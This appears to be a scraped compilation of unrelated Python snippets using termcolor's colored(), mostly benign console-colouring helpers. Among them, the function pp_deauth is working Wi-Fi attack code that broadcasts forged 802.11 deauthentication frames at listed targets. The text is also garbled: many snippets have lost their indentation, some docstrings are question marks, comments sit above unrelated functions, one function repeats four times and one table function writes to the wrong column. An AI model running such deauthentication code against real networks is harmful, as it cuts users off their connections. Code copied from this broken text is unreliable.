def get_diff_with_color(expected: str, ans: str) -> Tuple[str, str]:
    """Build colourised renderings of ``expected`` and ``ans`` from their diff.

    The two strings are compared element by element (one character at a
    time) with ``difflib.Differ``. Characters reported only for ``ans`` are
    wrapped with ``colored(..., "red")``, characters reported only for
    ``expected`` with ``colored(..., "green")``, and every other diff entry
    contributes its last character to both results unchanged.

    :param expected: the reference string.
    :param ans: the string compared against ``expected``.
    :return: ``(expected_with_mistake, ans_with_mistake)``.
    """
    expected_parts = []
    ans_parts = []
    for entry in difflib.Differ().compare(expected, ans):
        # Each diff entry is a two-character prefix followed by the element,
        # so the last character is the compared character itself.
        char = entry[-1]
        if entry.startswith("+"):
            ans_parts.append(colored(char, "red"))
        elif entry.startswith("-"):
            expected_parts.append(colored(char, "green"))
        else:
            expected_parts.append(char)
            ans_parts.append(char)
    return "".join(expected_parts), "".join(ans_parts)
# python类colored()的实例源码 (example source code using Python's colored())
def print_all_contents(self):
    """Print this entry's name, subdirectories and files, then recurse.

    All output goes through ``gc.msg``. The header line is a box-drawing
    branch character followed by one horizontal bar for every nesting level
    beyond the first, then ``[name]``. The ``D:`` line shows
    ``get_subdirs()`` in yellow and the ``F:`` line shows ``get_files()`` in
    white. Each element of ``self.subdirs`` is then printed the same way.
    """
    # One bar / one space per level past the first; nothing when nesting <= 1.
    depth = max(self.nesting - 1, 0)
    branch = u'\u251c' + u'\u2500' * depth
    gutter = u'\u2502' + ' ' * depth

    gc.msg(branch + '[' + self.name + ']')
    gc.msg(gutter + ' D: ' + colored(self.get_subdirs(), 'yellow'))
    gc.msg(gutter + ' F: ' + colored(self.get_files(), 'white'))
    for child in self.subdirs:
        child.print_all_contents()
# permanently delete this directory and its contents
def add_property(self, name, value):
    """Append one bordered ``name: value`` row to ``self.text``.

    The row is: a coloured left border, the label (``name`` plus a colon),
    filler up to ``self.label_width``, the coloured value, trailing filler,
    and a coloured right border.

    :param name: label text; its length decides the filler after the label.
    :param value: value text; its length decides the trailing filler.
    """
    left_border = colored(u'\u2502 ', self.border_color)
    label = colored(name + ':', self.label_color)
    # Filler between label and value; empty when the name is already as
    # long as (or longer than) the label column.
    label_pad = ' ' * (self.label_width - len(name))
    shown_value = colored(value, self.text_color)
    # Remaining filler before the closing border; the 4 accounts for the
    # two-character left border, the colon and the right border.
    tail_pad = ' ' * (self.width - len(value) - self.label_width - 4)
    right_border = colored(u'\u2502', self.border_color)
    self.text.append(
        left_border + label + label_pad + shown_value + tail_pad + right_border
    )
# resizes width of labels for property entries
def share(self):
    '''Compile a single Rain file into a shared object file.

    Calls ``self.build()`` first. If ``self.compiled`` is already set
    nothing else happens; otherwise the flag is set, ``compile_links()`` is
    called, and the compiler named by the ``CLANG`` environment variable
    (default ``clang``) is run on ``self.ll`` with ``-O2 -shared -fPIC``.
    The output file is ``self.target`` or, if that is falsy,
    ``self.qname + '.so'``.
    '''
    self.build()
    if not self.compiled:
        self.compiled = True
        self.compile_links()

        with self.okay('sharing'):
            output = self.target or self.qname + '.so'
            compiler = os.getenv('CLANG', 'clang')
            options = ['-O2', '-shared', '-fPIC']

            report = (
                ('target', output),
                ('flags', ' '.join(options)),
                ('src', self.ll),
            )
            for label, shown in report:
                self.vprint('{:>10} {}', label, X(shown, 'yellow'))

            subprocess.check_call([compiler, '-o', output, self.ll] + options)
def line_gen(basedir,chan):
    """Yield coloured display lines for a channel's chat log.

    The log is the ``.txt`` file with the greatest name inside
    ``<basedir>/<chan>.chat``. Items produced by ``tail_f`` that equal
    ``EWOULDBLOCK`` are skipped; every other item is UTF-8 encoded, split
    with ``split_line`` into time, name and rest, coloured, and yielded as
    one space-joined string.

    :param basedir: directory containing the ``<chan>.chat`` sub-directory.
    :param chan: channel name.
    """
    chat_dir = os.path.join(basedir, chan + ".chat")
    newest = max(entry for entry in os.listdir(chat_dir) if entry.endswith(".txt"))
    log_path = os.path.join(chat_dir, newest)
    channel = chan.encode('utf-8')
    for raw in tail_f(log_path):
        if raw == EWOULDBLOCK:
            continue
        stamp, nick, message = split_line(raw.encode('utf-8'))
        if nick[-1] == ':'.encode('utf-8'):
            # Name ends with a colon: bold styling and highlighted text.
            fields = (
                colored(stamp, 'cyan', attrs=['bold']),
                colored(channel, 'cyan', attrs=['bold']),
                colored(nick, 'red', attrs=['bold']),
                highlight(message),
            )
        else:
            # Anything else is rendered dimmed.
            fields = (
                colored(stamp, 'cyan'),
                colored(channel, 'cyan'),
                colored(nick, 'yellow', attrs=['dark']),
                colored(message, attrs=['dark']),
            )
        yield ' '.join(fields)
def run(flashcard: Flashcard, hint_rate=None):
    """Quiz the user on every card and print the final score.

    For each card, element 0 is printed as the problem and element 1 is the
    expected answer. When ``hint_rate`` is not ``None`` a hint produced by
    ``hint(expected, hint_rate)`` is shown first. The typed answer counts as
    correct when it equals the expected answer after stripping surrounding
    whitespace; otherwise a coloured diff of both strings is printed.

    :param flashcard: sized iterable of cards, each indexable at 0 and 1.
    :param hint_rate: value forwarded to ``hint``; ``None`` disables hints.
    """
    total = len(flashcard)
    correct = 0
    for number, card in enumerate(flashcard, start=1):
        problem, expected = card[0], card[1]
        print("# {:02d}".format(number), problem)
        if hint_rate is not None:
            print(colored("hint", "blue"), hint(expected, hint_rate))

        ans = input(">>>> ")
        is_correct = expected == ans.strip()
        if is_correct:
            correct += 1
            print(colored('GOOD', 'green'), colored(expected, "green"))
        else:
            marked_expected, marked_ans = get_diff_with_color(expected, ans)
            print(colored('MISS', 'red'), marked_expected)
            print(' ', marked_ans)
        # Separator after every card.
        print("*" * 100)
    print("{}/{}".format(correct, total))
def failUnlessException(self, exception_type, logic, *args, **kws):
"""????????????????????????
??????????????
:param logic ?????????
:param args ???????????
:param exception_type ???????
"""
try:
logic(*args, **kws)
except exception_type as e:
print
mark = colored("[Exception message] ", "yellow", attrs=['bold'])
print mark, colored(unicode(e), "yellow")
else:
self.fail(
"Expected exception {} not happened".format(exception_type))
def do_caller_job(self, line):
"""
??????????Job??
:param line ????????? [?????]
"""
cmd_args = re.split(r"\s+", line)
unit_name = cmd_args[0].strip()
if unit_name in self.units:
print colored(u"???? '{}' ????".format(unit_name), "red")
return
if len(cmd_args) >= 2:
func_name = cmd_args[1].strip()
else:
func_name = None
job_tpl = CallerBasedJobTemplate(unit_name, func_name)
self.units.append(job_tpl)
def log_request(self, code='-', size='-'):
    """Log the request line, colourised by status class when possible.

    ``code`` is converted with ``str()``. When the module-level
    ``termcolor`` name is truthy the request line is wrapped with
    ``termcolor.colored``: 1xx bold, 2xx white, 304 cyan, other 3xx green,
    404 yellow, other 4xx bold red, anything else bold magenta. The line is
    then passed to ``self.log`` at ``'info'`` level with the code and size.

    :param code: status code of the response.
    :param size: size value forwarded unchanged to the log call.
    """
    msg = self.requestline
    code = str(code)

    if termcolor:
        color = termcolor.colored
        # Slice instead of index so an empty code falls through to the
        # final branch instead of raising IndexError.
        status_class = code[:1]

        if status_class == '1':    # 1xx - Informational
            msg = color(msg, attrs=['bold'])
        # `elif`, not a second `if`: otherwise a 1xx line is styled twice
        # (bold here, then magenta by the final else).
        elif status_class == '2':  # 2xx - Success
            msg = color(msg, color='white')
        elif code == '304':        # 304 - Resource Not Modified
            msg = color(msg, color='cyan')
        elif status_class == '3':  # 3xx - Redirection
            msg = color(msg, color='green')
        elif code == '404':        # 404 - Resource Not Found
            msg = color(msg, color='yellow')
        elif status_class == '4':  # 4xx - Client Error
            msg = color(msg, color='red', attrs=['bold'])
        else:                      # 5xx, or any other response
            msg = color(msg, color='magenta', attrs=['bold'])

    self.log('info', '"%s" %s %s', msg, code, size)
def log_request(self, code='-', size='-'):
    """Log the request line, colourised by status class when possible.

    ``code`` is converted with ``str()``. When the module-level
    ``termcolor`` name is truthy the request line is wrapped with
    ``termcolor.colored``: 1xx bold, 2xx white, 304 cyan, other 3xx green,
    404 yellow, other 4xx bold red, anything else bold magenta. The line is
    then passed to ``self.log`` at ``'info'`` level with the code and size.

    :param code: status code of the response.
    :param size: size value forwarded unchanged to the log call.
    """
    msg = self.requestline
    code = str(code)

    if termcolor:
        color = termcolor.colored
        # Slice instead of index so an empty code falls through to the
        # final branch instead of raising IndexError.
        status_class = code[:1]

        if status_class == '1':    # 1xx - Informational
            msg = color(msg, attrs=['bold'])
        # `elif`, not a second `if`: otherwise a 1xx line is styled twice
        # (bold here, then magenta by the final else).
        elif status_class == '2':  # 2xx - Success
            msg = color(msg, color='white')
        elif code == '304':        # 304 - Resource Not Modified
            msg = color(msg, color='cyan')
        elif status_class == '3':  # 3xx - Redirection
            msg = color(msg, color='green')
        elif code == '404':        # 404 - Resource Not Found
            msg = color(msg, color='yellow')
        elif status_class == '4':  # 4xx - Client Error
            msg = color(msg, color='red', attrs=['bold'])
        else:                      # 5xx, or any other response
            msg = color(msg, color='magenta', attrs=['bold'])

    self.log('info', '"%s" %s %s', msg, code, size)
def handle_tcp_default(sk, dstport):
# Attempt to guess protocol according to what the client sends
data = ''
try:
rlist, _, _ = select.select([sk], [], [], 30)
if len(rlist) != 0:
data = sk.recv(20, socket.MSG_PEEK)
except Exception as err:
#print(traceback.format_exc())
pass
if data[:3] in SSL_CLIENT_HELLO_SIGNATURES:
print colored("Guessing this is a SSL/TLS connection, attempting to handshake.", 'red', attrs=['bold'])
handle_tcp_hexdump_ssl(sk, dstport)
elif data.startswith("GET "):
handle_tcp_http(sk, dstport)
elif data.startswith("CONNECT "):
handle_tcp_httpproxy(sk, dstport)
else:
handle_tcp_hexdump(sk, dstport)
sk.close()
# UDP DISPATCHER
def handle_tcp_hexdump(socket, dstport):
FILTER = ''.join([(len(repr(chr(x))) == 3) and chr(x) or '.' for x in range(256)])
length = 16
c = 0
for chars in recv_and_split_blocks(socket, length):
hexstr = ' '.join(["%02x" % ord(x) for x in chars])
printable = ''.join(["%s" % ((ord(x) <= 127 and FILTER[ord(x)]) or '.') for x in chars])
print colored("%04x %-*s %-*s" % (c, length*3, hexstr, length, printable), 'red', 'on_yellow')
c += len(chars)
print colored("%04x" % c, 'red', 'on_yellow')
try:
print("-- TCP TRANSPORT CLOSED --")
socket.close()
except:
pass
def display_execution_results(self, results, site):
""" Display execution summary
"""
cprint("|-Execution result", "magenta")
count = 0
for result in results:
plugin_name, stats = result
c = "cyan"
if count % 2:
c = "blue"
name = colored(" |-%15s" % plugin_name, c)
ok = colored("ok:%s"% stats[site.OK], "green")
skip = colored("skip:%s" % stats[site.SKIPPED], "yellow")
err = colored("error:%s" % stats[site.ERROR], "red")
print "%s\t%s\t%s\t%s" % (name, ok, skip, err)
count += 1
def get_img_extension_alternative_naming(extension):
    """Return the PIL format name and MIME type for a file extension.

    The lookup is case-insensitive and expects the leading dot
    (``".jpg"``, ``".jpeg"``, ``".png"``, ``".gif"``, ``".webp"``).

    :param extension: file extension including the leading dot.
    :return: ``[pil_format_name, mime_type]``; both items are ``None`` for
        an unrecognised extension.
    """
    known_formats = {
        ".jpg": ("JPEG", "image/jpeg"),
        ".jpeg": ("JPEG", "image/jpeg"),
        ".png": ("PNG", "image/png"),
        ".gif": ("GIF", "image/gif"),
        ".webp": ("WEBP", "image/webp"),
    }
    return list(known_formats.get(extension.lower(), (None, None)))
### colored output ###
def colored(text, _=None, *args, **kwargs):
    '''
    Returns the supplied text argument unchanged. This is a swap-in
    replacement for when termcolor.colored is not available.

    Besides the original two-argument form, the optional extra positional
    and keyword arguments that termcolor.colored accepts (for example
    ``on_color`` and ``attrs``) are accepted and ignored, so call sites
    written against the real function also work with this stand-in.

    :param text: Text to return
    :type text: string
    :param _: Fake argument, only required to match interface
              provided by termcolor.colored
    :param args: Further positional arguments, ignored
    :param kwargs: Further keyword arguments, ignored
    :return: The supplied text, unchanged
    :rtype: string
    '''
    return text
# The types of 'intent' that an argument to a Fortran subroutine
# may have
def run(self):
print _LOGO
args = self._parse_args()
if not os.path.exists(args.path):
print colored(
'Error: {} file do not exists'.format(args.path),
'red'
)
exit(-1)
if not os.path.exists(args.tests):
raise ValueError("Tests not found".format(
args.tests
))
# Find the test suite we need to execute
test_suite = self.__finder.find(args.tests)
# Run the test suite
self.__runner.run(test_suite)
def __executor(self, test):
module_ = test.__module__
class_ = test.im_class.__name__
method_ = test.__name__
full_test_name = "{}.{}.{}".format(
module_, class_, method_
)
print "Testing {}".format(
full_test_name
),
try:
result_ = test()
print colored("\t\tSuccess\r\n", "green")
except Exception, e:
print colored("\t\tFailed\r\n", "red")
print "{}\r\n".format(e)
self.__errors.append((full_test_name, e))
return True
def print_run_table(table_data):
table = SingleTable(table_data)
table.justify_columns = {0: 'left', 1: 'center', 2: 'left'}
table.inner_heading_row_border = False
table.inner_column_border = False
table.outer_border = False
max_width = table.column_max_width(2)
for index, row in enumerate(table_data):
table.table_data[index][2] = str(row[2][0:max_width].splitlines()[0])
if row[1] == 0:
table.table_data[index][1] = colored(str(row[1]), 'green')
elif row[1] == 1:
table.table_data[index][2] = colored(str(row[1]), 'yellow')
elif row[1] == 3:
table.table_data[index][2] = colored(str(row[1]), 'grey')
else:
table.table_data[index][2] = colored(str(row[1]), 'red')
print table.table
def show(self):
print colored("\n Filters", 'yellow', attrs=['bold'])
print " -------"
for key, value in self.filters.iteritems():
if str(self.filters[key]).lower() == "none":
print " |_" + key + " = " + str(value)
else:
print " |_" + colored(key + " = " + str(value), 'green', attrs=['bold'])
print colored("\n Display", 'yellow', attrs=['bold'])
print " -------"
for key, value in self.display.iteritems():
if str(self.display[key]).lower() == "false":
print " |_" + key + " = " + str(value)
else:
print " |_" + colored(key + " = " + str(value), 'green', attrs=['bold'])
print ""
def pp_deauth(blacklist):
"""
Starts deauthentication attack for PineAP Suite.
"""
attack_start = "[*] Attack has started for " + str(blacklist)
print colored(attack_start, 'red', attrs=['reverse', 'blink'])
time.sleep(2)
channel = 1
for target in blacklist:
clist = sniff(iface=iface, count=50)
channel = find_channel(clist, target)
deauth = RadioTap() / Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=target.lower(), addr3=target.lower()) / Dot11Deauth()
sendp(deauth, iface=iface, count=120, inter=.2, verbose=False)
time.sleep(1)
print colored("[*] Attack has completed..", 'green', attrs=['reverse', 'blink'])
time.sleep(2)
def connect(self):
    """Call to set connection with remote client.

    Opens an SSH session to ``self.client_`` (``ip``, ``user``, ``pass_``)
    and stores it in ``self.session``; an SFTP channel on that session is
    stored in ``self.SFTP``. On an authentication failure or when no valid
    connection can be made, the error is printed in red, logged, and the
    process exits.
    """
    try:
        ssh = self.session = paramiko.SSHClient()
        # NOTE(review): AutoAddPolicy accepts unknown host keys without
        # verification; confirm this is intended.
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        remote = self.client_
        ssh.connect(remote.ip, username=remote.user, password=remote.pass_)
        self.SFTP = ssh.open_sftp()
    except (paramiko.AuthenticationException,
            paramiko.ssh_exception.NoValidConnectionsError) as error:
        print(colored("> {}".format(error), 'red'))
        self.logger.error(error)
        sys.exit()
def log_request(self, code='-', size='-'):
    """Log the request line, colourised by status class when possible.

    ``code`` is converted with ``str()``. When the module-level
    ``termcolor`` name is truthy the request line is wrapped with
    ``termcolor.colored``: 1xx bold, 2xx white, 304 cyan, other 3xx green,
    404 yellow, other 4xx bold red, anything else bold magenta. The line is
    then passed to ``self.log`` at ``'info'`` level with the code and size.

    :param code: status code of the response.
    :param size: size value forwarded unchanged to the log call.
    """
    msg = self.requestline
    code = str(code)

    if termcolor:
        color = termcolor.colored
        # Slice instead of index so an empty code falls through to the
        # final branch instead of raising IndexError.
        status_class = code[:1]

        if status_class == '1':    # 1xx - Informational
            msg = color(msg, attrs=['bold'])
        # `elif`, not a second `if`: otherwise a 1xx line is styled twice
        # (bold here, then magenta by the final else).
        elif status_class == '2':  # 2xx - Success
            msg = color(msg, color='white')
        elif code == '304':        # 304 - Resource Not Modified
            msg = color(msg, color='cyan')
        elif status_class == '3':  # 3xx - Redirection
            msg = color(msg, color='green')
        elif code == '404':        # 404 - Resource Not Found
            msg = color(msg, color='yellow')
        elif status_class == '4':  # 4xx - Client Error
            msg = color(msg, color='red', attrs=['bold'])
        else:                      # 5xx, or any other response
            msg = color(msg, color='magenta', attrs=['bold'])

    self.log('info', '"%s" %s %s', msg, code, size)
def format_desc(desc, ref_desc, use_colour):
    """
    Return potentially colourised string list of descriptor features.

    Both descriptors are converted with ``desc_to_str`` and split on
    commas. Fields are paired up in order and compared character by
    character; when ``use_colour`` is truthy, characters equal to the
    reference character at the same position are wrapped in red. Positions
    past the end of a shorter field are rendered as a space.

    The returned list ends with an empty string, because every field is
    followed by a comma before the final split.
    """
    desc, ref_desc = desc_to_str(desc), desc_to_str(ref_desc)
    pieces = []
    for field, ref_field in zip(desc.split(","), ref_desc.split(",")):
        for char, ref_char in itertools.zip_longest(field, ref_field):
            # Matching characters are highlighted in red so similarities
            # between the descriptors are easy to spot visually.
            if use_colour and char == ref_char:
                pieces.append(termcolor.colored(char, "red"))
            elif char is None:
                pieces.append(" ")
            else:
                pieces.append(char)
        pieces.append(",")
    return "".join(pieces).split(",")
def choose_method_championsleague(self):
    """Show the Champions League menu and run the selected action.

    The prompt repeats until one of ``1``-``5`` is entered. ``1`` prints
    the standings of the first eight entries of ``groups``, ``2`` prints
    the group-stage results, ``3`` prints the match scores of each of
    those eight groups, ``4`` prints the top scorers, and ``5`` does
    nothing and returns.
    """
    menu = colored("Champions League: \n[1]Group Stage Standings [2]Group Stage Results [3]Results by Group"
                   " [4]TopScorers [5]Main Menu\n", 'red', attrs=['bold'])
    choice = input(menu)
    while choice not in ("1", "2", "3", "4", "5"):
        choice = input(menu)

    if choice == "1":
        for idx in range(8):
            group = groups[idx]
            ChampionsLeague.champions_league_groupstage(self, group_stage + group, group_name=group[0])
    elif choice == "2":
        MatchScores.match_details(self, index=0, league_url=group_stage_topstats, league_name='Champions League')
    elif choice == "3":
        for idx in range(8):
            group = groups[idx]
            cprint("\nRetrieving Match Scores for Champions League Group " + group[0].title(), 'yellow')
            MatchScores.match_details(self, index=0, league_url=group_stage + group, league_name="")
    elif choice == "4":
        TopStats.top_scorers(self, group_stage_topstats, league_name='Champions League')
    # "5" (main menu): nothing to do here.
def choose_method(self, class_name):
    """Show the league menu and run ``class_name`` for the chosen league.

    The prompt repeats until one of ``1``-``6`` is entered. ``6`` calls
    ``main()``; every other choice calls ``ChooseMenu.run_method`` with the
    matching league URL and league name.

    :param class_name: value forwarded to ``ChooseMenu.run_method``.
    """
    menu = colored("Which League do you want?\n[1]EPL [2]Liga BBVA [3]Serie A [4]Ligue 1 "
                   "[5]Bundesliga [6]Main Menu\n", 'red', attrs=['bold'])
    choice = input(menu)
    while choice not in ("1", "2", "3", "4", "5", "6"):
        choice = input(menu)

    if choice == "6":
        main()
        return

    leagues = {
        "1": (epl, 'Premier League'),
        "2": (liga, 'Liga BBVA'),
        "3": (serie_A, 'Serie A'),
        "4": (ligue_1, 'Ligue 1'),
        "5": (bundesliga, 'Bundesliga'),
    }
    league_url, league_name = leagues[choice]
    ChooseMenu.run_method(self, class_name, league_url, league_name=league_name)
def apply_rules(ruletype, gcpobjects, descfield, outfile, project):
rules = loadrules(ruletype)
for obj in gcpobjects:
for rule in rules:
if 'filtercondition' in rule:
res = apply_rule_filters(obj, rule['filters'],
rule['filtercondition'])
else:
res = apply_rule_filters(obj, rule['filters'])
if res:
print colored('MATCH:', 'red'), \
"object '%s' matches rule '%s'" \
% (obj[descfield], rule['name'])
with open(outfile, 'a') as f:
f.write(datetime.datetime.now().ctime()
+ ": Project: " + project
+ " | Object: " + obj[descfield]
+ " | Matches rule: " + rule['name']
+ "\n" + json.dumps(obj) + "\n\n")
def init_project(self):
project_dir_git = os.path.join(self._project_dir, 'repo')
if not self._config['repo']:
raise Exception('Empty repo configuration')
create_dir(project_dir_git)
git_path = os.path.join(project_dir_git, '.git')
if os.path.exists(git_path):
repo = Repo(project_dir_git)
print colored('Pulling', 'green') + ' repo %s' % self._config['repo']
repo.remotes.origin.pull()
else:
try:
print 'cloning... %s' % self._config['repo']
Repo.clone_from(self._config['repo'], project_dir_git)
except GitCommandError as e:
print 'Repo cannot be found'
def get_config(config_path=None):
"""
Loads configuration from yaml file
"""
if not config_path:
config_path = os.path.join(
os.path.dirname(
os.path.dirname(os.path.abspath(__file__))
), 'config.yml')
if not os.path.exists(config_path):
print colored("Error: ", "red") + " config path not found %s" % config_path
exit()
with file(config_path) as stream:
return yaml.load(stream)
def execute(self, project):
modified_files = project.diff()
if modified_files:
print '%d files has been modified' % len(modified_files)
for _file in modified_files:
if _file.change_type in ['D', 'M']:
word = 'New' if _file.change_type == 'D' else 'Modified'
print "- %s " % word + colored(_file.file_path, "green")
buffer = open_file(_file.file_path)
try:
self._create_tables(buffer, _file.file_path)
# self.update_lock(project)
except ValueError, e:
raise e
else:
print 'Everything up to date'
def log_request(self, code='-', size='-'):
    """Log the request line, colourised by status class when possible.

    ``code`` is converted with ``str()``. When the module-level
    ``termcolor`` name is truthy the request line is wrapped with
    ``termcolor.colored``: 1xx bold, 2xx white, 304 cyan, other 3xx green,
    404 yellow, other 4xx bold red, anything else bold magenta. The line is
    then passed to ``self.log`` at ``'info'`` level with the code and size.

    :param code: status code of the response.
    :param size: size value forwarded unchanged to the log call.
    """
    msg = self.requestline
    code = str(code)

    if termcolor:
        color = termcolor.colored
        # Slice instead of index so an empty code falls through to the
        # final branch instead of raising IndexError.
        status_class = code[:1]

        if status_class == '1':    # 1xx - Informational
            msg = color(msg, attrs=['bold'])
        # `elif`, not a second `if`: otherwise a 1xx line is styled twice
        # (bold here, then magenta by the final else).
        elif status_class == '2':  # 2xx - Success
            msg = color(msg, color='white')
        elif code == '304':        # 304 - Resource Not Modified
            msg = color(msg, color='cyan')
        elif status_class == '3':  # 3xx - Redirection
            msg = color(msg, color='green')
        elif code == '404':        # 404 - Resource Not Found
            msg = color(msg, color='yellow')
        elif status_class == '4':  # 4xx - Client Error
            msg = color(msg, color='red', attrs=['bold'])
        else:                      # 5xx, or any other response
            msg = color(msg, color='magenta', attrs=['bold'])

    self.log('info', '"%s" %s %s', msg, code, size)